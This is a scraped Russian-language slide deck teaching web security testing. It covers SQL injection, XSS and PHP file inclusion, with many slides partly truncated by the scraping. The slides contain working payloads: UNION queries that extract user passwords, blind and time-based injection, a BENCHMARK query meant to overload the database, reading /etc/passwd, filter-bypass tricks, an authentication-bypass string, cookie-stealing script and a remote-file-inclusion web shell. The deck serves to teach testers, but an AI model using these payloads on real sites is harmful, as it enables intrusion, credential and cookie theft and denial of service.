🗊 Презентация Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co.

Категория: Образование
Нажмите для полного просмотра!
Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №1 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №2 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №3 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №4 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №5 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №6 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №7 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №8 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №9 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №10 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №11 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №12 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №13 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №14 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №15 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №16 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №17 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №18 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №19 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №20 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №21 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №22 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №23 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №24 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №25 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №26 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №27 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №28 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №29 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №30 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №31 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №32 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №33 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №34 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №35 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №36 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №37 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №38 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №39 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №40 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №41 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №42 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №43 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №44 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №45 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №46 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №47 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №48 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №49 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №50 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №51 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №52 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №53 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №54 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №55 Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №56

Содержание

Вы можете ознакомиться и скачать презентацию на тему Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co.. Доклад-сообщение содержит 56 слайдов. Презентации для любого класса можно скачать бесплатно. Если материал и наш сайт презентаций Mypresentation Вам понравились – поделитесь им с друзьями с помощью социальных кнопок и добавьте в закладки в своем браузере.

Слайды и текст этой презентации


Слайд 1


Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co.
Описание слайда:
Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co.

Слайд 2


Зачем нужно тестировать защищенность 90% сайтов опасны для пользователей и представляют угрозу бизнесу. 43% сайтов не могут хранить конфиденциальную...
Описание слайда:
Зачем нужно тестировать защищенность 90% сайтов опасны для пользователей и представляют угрозу бизнесу. 43% сайтов не могут хранить конфиденциальную информацию в БД. 80% Вебмастеров не обновляют opensource продукты вовремя. 99,9% сайтов, которые имеют уязвимость, имеют еще несколько уязвимостей. 48% серверов имеют уязвимости на уровне операционной системы и приложений.

Слайд 3


SQL Injection Внедрение SQL-кода — один из распространённых способов взлома сайтов и программ, работающих с базами данных, основанный на внедрении в...
Описание слайда:
SQL Injection Внедрение SQL-кода — один из распространённых способов взлома сайтов и программ, работающих с базами данных, основанный на внедрении в запрос произвольного SQL-кода.

Слайд 4


Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №4
Описание слайда:

Слайд 5


Что может получить злоумышленник
Описание слайда:
Что может получить злоумышленник

Слайд 6


Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №6
Описание слайда:

Слайд 7


Архитектура уязвимости типа SQL Injection
Описание слайда:
Архитектура уязвимости типа SQL Injection

Слайд 8


Простейший способ обнаружить уязвимость Добавляем одинарную кавычку к запросу: Получаем ошибку типа: Warning: mysql_fetch_object(): supplied argument...
Описание слайда:
Простейший способ обнаружить уязвимость Добавляем одинарную кавычку к запросу: Получаем ошибку типа: Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/mysite/www/htdocs/include/lib/news.php Или Видим ту же самую страницу что и по ссылке

Слайд 9


Почему так происходит? query = "SELECT * FROM news WHERE id = '" + id + "'" SELECT * FROM news WHERE id = '1''
Описание слайда:
Почему так происходит? query = "SELECT * FROM news WHERE id = '" + id + "'" SELECT * FROM news WHERE id = '1''

Слайд 10


Какие еще есть способы проверки? Использование простых арифметических операций в запросе: site.com/index.php?id=2-1(Выводит страницу 1)...
Описание слайда:
Какие еще есть способы проверки? Использование простых арифметических операций в запросе: site.com/index.php?id=2-1(Выводит страницу 1) site.com/index.php?id=1*2(Выводит страницу 2) site.com/index.php?id=1+and+1=1(Выводит страницу 1) Использование сортировки в запросе: site.com/index.php?showthread=285+ORDER+BY+1--+ Подстановка бессмысленной информации в запрос site.com/index.php?id=1 anything (Выводит сообщение об ошибке)

Слайд 11


Как этим пользоваться? /?id=1' UNION SELECT user,password FROM users-- SELECT title,text FROM news WHERE id = '1' SELECT title,text FROM news WHERE...
Описание слайда:
Как этим пользоваться? /?id=1' UNION SELECT user,password FROM users-- SELECT title,text FROM news WHERE id = '1' SELECT title,text FROM news WHERE id = '1' UNION SELECT user,password FROM users

Слайд 12


Blind SQL injection Тестирование истинных и ложных запросов: site.com/index.php?id=2’ AND ‘1’ = ‘1’-- site.com/index.php?id=2’ AND ‘1’=‘2’-- Вывод...
Описание слайда:
Blind SQL injection Тестирование истинных и ложных запросов: site.com/index.php?id=2’ AND ‘1’ = ‘1’-- site.com/index.php?id=2’ AND ‘1’=‘2’-- Вывод информации в отчете об ошибках: site.com/index.php?id=2’ OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY MID(VERSION(), FLOOR(RAND(0)*2), 64)) -- Duplicate entry '5.0.45' for key 1

Слайд 13


Double-blind injection Посимвольный перебор с помощью Benchmark: site.com/index.php?id=2’ OR id= IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1,...
Описание слайда:
Double-blind injection Посимвольный перебор с помощью Benchmark: site.com/index.php?id=2’ OR id= IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, BENCHMARK(2999999,MD5(NOW()))) – Способ навредить серверу БД: site.com/index.php?id=2’ AND BENCHMARK(100000, BENCHMARK(100000,md5(current_time)))

Слайд 14


На что еще обращать внимание? URL:
Описание слайда:
На что еще обращать внимание? URL:

Слайд 15


Практика, или SQL Injection глазами злоумышленника Определение типа базы данных Проверка прав пользователя на запись файлов Подбор количества...
Описание слайда:
Практика, или SQL Injection глазами злоумышленника Определение типа базы данных Проверка прав пользователя на запись файлов Подбор количества столбцов Определение вывода на экран Получение информации о таблицах Получение информации о колонках в требуемой таблице Получение данных из таблицы и вывод на экран

Слайд 16


Ошибки характерные для разных видов баз данных
Описание слайда:
Ошибки характерные для разных видов баз данных

Слайд 17


Подбор количества столбцов 1. Простой перебор допустим у нас есть сайт с инъекцией: Выполняем такой запрос -- если появилась ошибка, то увеличиваем...
Описание слайда:
Подбор количества столбцов 1. Простой перебор допустим у нас есть сайт с инъекцией: Выполняем такой запрос -- если появилась ошибка, то увеличиваем количество колонок на одну -- и так пока не исчезнет ошибка и появится пустая страница

Слайд 18


2. Оператор ORDER BY ошибки нет, значит столбцов 1 или больше 1 должна появится ошибка, значит столбцов меньше 9999 Далее подбираем таким образом...
Описание слайда:
2. Оператор ORDER BY ошибки нет, значит столбцов 1 или больше 1 должна появится ошибка, значит столбцов меньше 9999 Далее подбираем таким образом правильное количество, предположим в нашем случае 4 столбца, тогда: (ошибки не будет) (ошибка есть)

Слайд 19


Определение вывода Предположим мы подобрали количество столбцов и их оказалось 4 Теперь нас интересует в какой части страницы, какая колонка...
Описание слайда:
Определение вывода Предположим мы подобрали количество столбцов и их оказалось 4 Теперь нас интересует в какой части страницы, какая колонка выводится. Для этого подставим вместо одного из null – произвольный набор символов, в нашем случае «111»

Слайд 20


Получаем информацию о версии и пользователе Для получения информации о текущем пользователе используется функция user() Для определения версии...
Описание слайда:
Получаем информацию о версии и пользователе Для получения информации о текущем пользователе используется функция user() Для определения версии используется функция version()

Слайд 21


Чтение и запись файлов Проверка возможности чтения/записи файлов: ‘%USERNAME%'-- Чтение файла union+select+LOAD_FILE('/etc/passwd')+from+mysql.user--
Описание слайда:
Чтение и запись файлов Проверка возможности чтения/записи файлов: ‘%USERNAME%'-- Чтение файла union+select+LOAD_FILE('/etc/passwd')+from+mysql.user--

Слайд 22


Узнаем таблицы Для получения информации о таблицах и колонках необходимо обратиться к служебной таблице Information_schema RMATION_SCHEMA.TABLES--...
Описание слайда:
Узнаем таблицы Для получения информации о таблицах и колонках необходимо обратиться к служебной таблице Information_schema RMATION_SCHEMA.TABLES-- Таким запросом мы узнаём первую таблицу, но нам надо узнать и другие RMATION_SCHEMA.TABLES+LIMIT+1+OFFSET+1--

Слайд 23


Получаем информацию о колонках Перебрав таблицы, определяем ту которая нам будет интересна. Пусть это будет USER, что требуется для получения...
Описание слайда:
Получаем информацию о колонках Перебрав таблицы, определяем ту которая нам будет интересна. Пусть это будет USER, что требуется для получения информации о колонках: ORMATION_SCHEMA.COLUMNS-- Таким обрfзом мы выводим названия колонок всех таблиц. Но нам надо узнать имена колонок именно в таблице USER Изменяем немного наш запрос добавляя в него оператор WHERE: ORMATION_SCHEMA.COLUMNS+where+TABLE_NAME='user'-- Появится имя первой колонки в таблице user и далее добавляя LIMIT+OFFSET узнаём все колонки.

Слайд 24


Фильтрация кавычек Чаще всего, проделав действия описанные на предыдущем слайде, вы увидите ошибку: ERROR: syntax error at or near "user"...
Описание слайда:
Фильтрация кавычек Чаще всего, проделав действия описанные на предыдущем слайде, вы увидите ошибку: ERROR: syntax error at or near "user" at character 122 ORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=chr(117)| |chr(115)||chr(101)||chr(114)--

Слайд 25


Фильтрация кавычек Второй способ: использование вложенного подзапроса...
Описание слайда:
Фильтрация кавычек Второй способ: использование вложенного подзапроса ORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=(select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1+offset+1)--

Слайд 26


Фильтация пробелов В случае фильтрации пробелов существуют следующий способы обхода фильтра: Использование пробельных символов «/*!*/» и «/**/»...
Описание слайда:
Фильтация пробелов В случае фильтрации пробелов существуют следующий способы обхода фильтра: Использование пробельных символов «/*!*/» и «/**/» SELECT * FROM news WHERE id='1'/**/UNION/**/SELECT/**/1,2,3,4,5,6/**/FROM/**/Users/**/WHERE/**/login='admin'#‘ или SELECT * FROM news WHERE id='1'/*!UNION*/SELECT/*!1,2,3,4,5,6*/FROM/*!Users*/WHERE/*!login='admin'*/#' Использование символов табуляции: %09 – табуляция %0A – символ новой строка %0D – возврат каретки %0B – вертикальная табуляция %0C – символ новой страницы 9WHERE%09login='admin'#

Слайд 27


Получение информации из таблицы Составляем запрос: Он возвратит нам в данном случае имя пользователя Можно объединять 2 и более колонки разделяя их...
Описание слайда:
Получение информации из таблицы Составляем запрос: Он возвратит нам в данном случае имя пользователя Можно объединять 2 и более колонки разделяя их спец символом null+from+user-- Мы увидим запись типа Login:email

Слайд 28


Уязвимость в скрипте авторизации Поле ввода имени пользователя: Username’-- Поле ввода пароля: 123' OR login='Admin' – %
Описание слайда:
Уязвимость в скрипте авторизации Поле ввода имени пользователя: Username’-- Поле ввода пароля: 123' OR login='Admin' – %

Слайд 29


Демонстрация примеров Демонстрация примеров
Описание слайда:
Демонстрация примеров Демонстрация примеров

Слайд 30


Программы для работы с инъекциями SQL InjectMe – плагин для Firefox Absinthe – утилита для проведения атак типа SQL Injection SQL checker –...
Описание слайда:
Программы для работы с инъекциями SQL InjectMe – плагин для Firefox Absinthe – утилита для проведения атак типа SQL Injection SQL checker – анализатор возможности внедрения SQL кода

Слайд 31


XSS XSS (Сross Site Sсriрting — «межсайтовый скриптинг») — тип уязвимости интерактивных информационных систем в вебе. XSS возникает, когда в...
Описание слайда:
XSS XSS (Сross Site Sсriрting — «межсайтовый скриптинг») — тип уязвимости интерактивных информационных систем в вебе. XSS возникает, когда в генерируемые сервером страницы по какой-то причине попадают пользовательские скрипты.

Слайд 32


XSS
Описание слайда:
XSS

Слайд 33


XSS Цель Выполнить «чужеродный» JavaScript-код в браузере клиента, когда он находится на атакуемом сайте Как это сделать? Внедрить куда-нибудь...
Описание слайда:
XSS Цель Выполнить «чужеродный» JavaScript-код в браузере клиента, когда он находится на атакуемом сайте Как это сделать? Внедрить куда-нибудь фрагмент кода типа ...

Слайд 34


Классификация XSS Активный XSS Внедренный скрипт сохраняется в системе и становится доступен для вывода другим пользователям Пассивный XSS Скрипт...
Описание слайда:
Классификация XSS Активный XSS Внедренный скрипт сохраняется в системе и становится доступен для вывода другим пользователям Пассивный XSS Скрипт передается системе в параметрах HTTP-запроса с последующим их выводом в HTML-страницу.

Слайд 35


Чем мы рискуем? Кража Cookies var іmg = new Image(); іmg.srс = ' + document.cookie; Кража аутентификационных данных добавление обработчика события...
Описание слайда:
Чем мы рискуем? Кража Cookies var іmg = new Image(); іmg.srс = ' + document.cookie; Кража аутентификационных данных добавление обработчика события onsubmit к существующей форме добавление формы с просьбой ввести пароль Перенаправление пользователя на страницы злоумышленников DDOS атаки

Слайд 36


Метод обнаружения /?id=">alert(1) HTML - код страницы примет вид .. alert(1)"... В результате браузер выполнит скрипт.
Описание слайда:
Метод обнаружения /?id=">alert(1) HTML - код страницы примет вид .. alert(1)"... В результате браузер выполнит скрипт.

Слайд 37


Типичный случай Самая распространенная разновидность XSS: ">alert() Вся суть в "> После добавления к форме ">alert() какой-то...
Описание слайда:
Типичный случай Самая распространенная разновидность XSS: ">alert() Вся суть в "> После добавления к форме ">alert() какой-то переменной присваивается значение поля. Переменная обрабатывается, "> закрывает скрипт и выполняет alert()

Слайд 38


Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co., слайд №38
Описание слайда:

Слайд 39


Фильтры: определяем наличие и качество В любое поле вводим проверочную строку: '';!--"=&{()} Далее открываем HTML страницы, ищем слово...
Описание слайда:
Фильтры: определяем наличие и качество В любое поле вводим проверочную строку: '';!--"=&{()} Далее открываем HTML страницы, ищем слово "XSSTEST" и смотрим на прилегающие к нему символы. Если символы остались – это первый признак наличия уязвимости Если символы ,"'\ остались такими, как были введены – это второй признак уязвимости (возможно использование дополнительных символов в последующей XSS атаке) Если в HTML, вы не обнаружили - это признак отсутствия фильтрации. Если открыв HTML вы обнаружили, что заменены на другие символы – фильтр функционирует нормально.

Слайд 40


Практика Допустим фильтр экранирует В этом случае существует вероятность обхода фильтра. К примеру, фильтр настроен на удаление , и . Для проверки...
Описание слайда:
Практика Допустим фильтр экранирует В этом случае существует вероятность обхода фильтра. К примеру, фильтр настроен на удаление , и . Для проверки используем конструкцию типа и проверяем, если фильтр не удалил запись - можно составить XSS-скрипт. К примеру вот так: alert()

Слайд 41


Автозакрывающиеся скобки: >>>>
Описание слайда:
Автозакрывающиеся скобки: >>>>

Слайд 42


Кража Cookies До этого мы рассматривали скрипты типа: alert (' Test ') javascript:alert (' Test ')/ javascript:alert(' Test ')/1.jpg и так далее.....
Описание слайда:
Кража Cookies До этого мы рассматривали скрипты типа: alert (' Test ') javascript:alert (' Test ')/ javascript:alert(' Test ')/1.jpg и так далее.. Теперь рассмотрим следующий скрипт: img = new Image(); img.src = " В данном виде скрипт перехватывает cookies пользователя.

Слайд 43


Как воспользоваться этим скриптом? Image();img.src=" При этом файл js.js содержит: img=new Image();img.src=" этот способ более надёжен.
Описание слайда:
Как воспользоваться этим скриптом? Image();img.src=" При этом файл js.js содержит: img=new Image();img.src=" этот способ более надёжен.

Слайд 44


Изменение кодировки Изначально скрипт выглядел так: После:...
Описание слайда:
Изменение кодировки Изначально скрипт выглядел так: После: %68%74%74%70%3A%2F%2F%63%69%74%65%2E%63%6F%6D%2F%74%65%73%74%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%6E%65%74%2F%73%63%72%69%70%74%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E%0A

Слайд 45


DDoS-атака XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста — много запросов, которые не...
Описание слайда:
DDoS-атака XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста — много запросов, которые не выдерживает атакуемый сервер. Собственно отношение к XSS имеет косвенное, поскольку скрипты могут и не использоваться вовсе, достаточно конструкции вида:

Слайд 46


Демонстрация примеров Демонстрация примеров
Описание слайда:
Демонстрация примеров Демонстрация примеров

Слайд 47


Инструменты для обнаружения XSS XSSme – аддон для Firfox DOMinator – анализатор наличия DOM-based XSS
Описание слайда:
Инструменты для обнаружения XSS XSSme – аддон для Firfox DOMinator – анализатор наличия DOM-based XSS

Слайд 48


PHP Injection PHP Injection или создание веб шеллов – это второй по популярности после SQL инъекции тип уязвимостей.
Описание слайда:
PHP Injection PHP Injection или создание веб шеллов – это второй по популярности после SQL инъекции тип уязвимостей.

Слайд 49


Уязвимые функции Eval() Include() Require() Create_function() Preg_replace()
Описание слайда:
Уязвимые функции Eval() Include() Require() Create_function() Preg_replace()

Слайд 50


Виды инклудов Возможен Remote File Inclusion (RFI) Возможен Local File Inclusion (LFI) с использованием нулл байта Возможен RFI при условии создания...
Описание слайда:
Виды инклудов Возможен Remote File Inclusion (RFI) Возможен Local File Inclusion (LFI) с использованием нулл байта Возможен RFI при условии создания структуры /folder/page.php на удаленном сервере

Слайд 51


Метод определения уязвимости index.php?page=shop Подставим dsdsds вместо shop: Warning: main(dsdsds.php): failed to open stream: No such file or...
Описание слайда:
Метод определения уязвимости index.php?page=shop Подставим dsdsds вместо shop: Warning: main(dsdsds.php): failed to open stream: No such file or directory in /home/user/www//page.php on line 3 Warning: main(dsdsds.php): failed to open stream: No such file or directory in /home/user/www/page.php on line 3 Warning: main(): Failed opening 'dsdsds.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php:/usr/local/share/pear') in /home/user/www/page.php on line 3

Слайд 52


Веб шелл Это происходит потому, что код страницы имеет такой элемент Как этим воспользоваться? index.php?page= Получаем веб шелл, который дает...
Описание слайда:
Веб шелл Это происходит потому, что код страницы имеет такой элемент Как этим воспользоваться? index.php?page= Получаем веб шелл, который дает возможность исполнять любые php команды

Слайд 53


Выход за пределы текущего каталога Apache Tomcat 5 версии ниже 5.5.22 и Apache Tomcat 6 ниже 6.0.10 подвержен уязвимости поволяющей перейти к...
Описание слайда:
Выход за пределы текущего каталога Apache Tomcat 5 версии ниже 5.5.22 и Apache Tomcat 6 ниже 6.0.10 подвержен уязвимости поволяющей перейти к содержимому вышестоящей директории путем указания в пути конструкции "../".

Слайд 54


Инструменты для обнаружения Graudit - семантически-статический анализатор кода RIPS – утилита для поискам уязвимостей в PHP коде
Описание слайда:
Инструменты для обнаружения Graudit - семантически-статический анализатор кода RIPS – утилита для поискам уязвимостей в PHP коде

Слайд 55


Демонстрация примеров Демонстрация примеров
Описание слайда:
Демонстрация примеров Демонстрация примеров

Слайд 56


Вопросы? Email: bondarenko.ihar@yandex.ru Twitter: @iharbondarenko Skype: igor.bondarenko1
Описание слайда:
Вопросы? Email: bondarenko.ihar@yandex.ru Twitter: @iharbondarenko Skype: igor.bondarenko1



Похожие презентации
Mypresentation.ru
Загрузить презентацию